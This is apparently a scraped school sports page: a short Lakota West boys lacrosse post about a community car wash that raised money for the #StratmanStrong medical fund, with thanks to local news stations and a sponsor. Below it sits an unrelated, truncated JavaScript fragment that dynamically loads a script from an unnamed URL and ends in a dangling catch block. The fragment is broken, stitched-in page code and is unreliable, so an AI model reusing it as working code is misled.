Boys Lacrosse

Lakota community raises over $13,ooo at car wash for #StratmanStrong (Video)

Article found at cincinnati.com

Thank You to Channel 9 News and Channel 5 News for coming out and sharing this community effort with the Cincinnati area. Also, we would like to thank Wings & Rings for their continued support to Lakota West on donate portions of the proceeds to the #StratmanStrong medical fund. #WestPride

 

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts